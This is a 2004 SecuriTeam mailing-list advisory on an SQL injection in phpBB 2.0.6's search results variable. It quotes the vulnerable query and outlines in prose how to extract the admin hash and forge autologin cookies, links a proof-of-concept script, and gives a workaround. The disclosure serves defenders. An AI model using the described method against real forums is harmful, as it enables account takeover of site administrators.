[UNIX] PhpBB SQL Injection In Search Results Variable

• Previous message: SecuriTeam: "[REVS] Attacks and Counter Measures in 2.5G and 3G Cellular IP Networks"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 25 Mar 2004 16:54:46 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  PhpBB SQL Injection In Search Results Variable
------------------------------------------------------------------------

SUMMARY

 <http://www.phpbb.com/> phpBB is "a high powered, fully scalable, and
highly customizable open-source bulletin board package. phpBB has a
user-friendly interface, simple and straightforward administration panel,
and helpful FAQ. Based on the powerful PHP server language and your choice
of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the
ideal free community solution for all web sites."

An SQL injection vulnerability exists in phpBB when register_globals is
set to "on" via the search results variable.

DETAILS

Vulnerable Systems:
 * phpBB version 2.0.6

An SQL injection exists in the $search_results variable when performing a
search in phpBB, on line 711 when the $show_results variable is not set to
'posts' or `topics':

$sql = "SELECT t.*, f.forum_id, f.forum_name, u.username, u.user_id,
u2.username as user2, u2.user_id as id2, p.post_username, p2.post_username

AS post_username2, p2.post_time
                                        FROM " . TOPICS_TABLE . " t, " .
FORUMS_TABLE . " f, " . USERS_TABLE .
" u, " . POSTS_TABLE . " p, " . POSTS_TABLE . " p2, " . USERS_TABLE . " u2
                                        WHERE t.topic_id IN
($search_results)
                                                  AND t.topic_poster =
u.user_id
                                                  AND f.forum_id =
t.forum_id
                                                  AND p.post_id =
t.topic_first_post_id
                                                  AND p2.post_id =
t.topic_last_post_id
                                                  AND u2.user_id =
p2.poster_id";

One of the tables used in the SELECT query is the users table. This can be
used to determine the admin's hash by guessing whether certain queries are
true or false with search results from MySQL 3. Once the admin's hash is
known and taking advantage of phpBB's autologin feature, one can forge
cookies and login as the administrator without needing to crack the
password.

A proof of concept script can be found at
<http://www.scan-associates.net/papers/gemuruh-v2.php.txt>
http://www.scan-associates.net/papers/gemuruh-v2.php.txt.

Workaround
Turn off register_globals in the PHP configuration file.

ADDITIONAL INFORMATION

The information has been provided by
<mailto:pokleyzz@scan-associates.net> pokley.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[REVS] Attacks and Counter Measures in 2.5G and 3G Cellular IP Networks"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]